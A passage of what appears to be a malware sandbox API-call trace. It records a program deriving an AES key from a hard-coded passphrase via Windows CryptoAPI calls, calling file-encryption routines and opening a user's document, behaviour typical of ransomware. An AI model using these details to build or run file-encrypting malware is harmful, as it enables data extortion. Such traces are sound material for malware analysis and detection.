hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4fa8 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.934] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.934] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.934] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431da28 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0079.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0079.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cabf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.937] CloseHandle (hObject=0x298) returned 1 [0079.937] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.937] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.953] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f95ae0, ftCreationTime.dwHighDateTime=0x1d5e9f1, ftLastAccessTime.dwLowDateTime=0xb1d65d40, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0xb1d65d40, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="JzioP.odp", cAlternateFileName="")) returned 0x41ac440 [0079.953] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0079.953] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.953] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a5030) returned 1 [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.954] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.954] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.954] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.955] CryptCreateHash (in: hProv=0x41a5030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.955] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb0d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.955] CryptHashData (hHash=0x41ac780, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.955] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb2b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.955] CryptDeriveKey (in: hProv=0x41a5030, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac000) returned 1 [0079.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.956] CryptDestroyHash (hHash=0x41ac780) returned 1 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0079.956] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0079.957] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0079.957] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.957] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\jziop.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.957] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.957] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.958] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0079.958] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0079.958] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.958] RtlAllocateHeap 